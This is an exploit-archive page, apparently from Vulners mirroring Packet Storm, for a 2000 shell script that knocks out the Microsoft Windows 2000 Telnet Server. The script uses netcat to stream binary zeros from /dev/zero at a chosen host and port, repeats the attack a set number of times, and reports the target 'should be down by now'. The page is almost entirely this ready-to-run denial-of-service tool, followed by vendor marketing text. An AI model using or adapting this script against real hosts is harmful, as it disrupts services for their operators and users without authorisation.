Lucene search
K

msw2ktelnetdos.sh

🗓️ 07 Sep 2000 00:00:00Reported by WCType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

Denial of Service attack on Microsoft Windows 2000 Telnet Server using binary zeros stream.

Code
`##################################################################  
# #  
# Microsoft Windows 2000 Telnet Server DoS Vulnerability #  
# #  
# #  
# Microsoft Windows 2000 Server comes with a telnet server to #  
# provide remote console access. A remote attacker can send a #  
# stream of binary zeros to the server, causing it to fail. If #  
# automatic restart is enabled, numerous attacks will cause the #  
# telnet server to restart until the maximum failure/restart #  
# count is exceeded at which point the service is disabled. #  
# #  
##################################################################  
  
nc_path="/usr/bin/nc"  
timez=1  
port=23  
  
if test $# -lt 1  
then  
echo "Microsoft Windows 2000 Telnet Server DoS by [email protected]"  
echo "Usage: msW2kTelnetDoS.sh <host> [number of timez to hit] [port]"  
else  
echo "Microsoft Windows 2000 Telnet Server DoS by [email protected]"  
if test -f $nc_path  
then  
if test $# -eq 2  
then  
timez=$2  
elif test $# -eq 3  
then  
port=$3  
fi  
test_var=0  
echo "Hitting $1 [$port] $timez timez..."  
while test $test_var -lt $timez  
do  
$nc_path $1 $port < /dev/zero  
test_var=`expr $test_var + 1`  
done  
echo "All done...$1 should be down by now :]"  
else  
echo "netcat wasnt found on the path you defined ($nc_path)"  
fi  
echo "Regardz, [email protected]"  
fi  
/* www.hack.co.za [1 August]*/`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation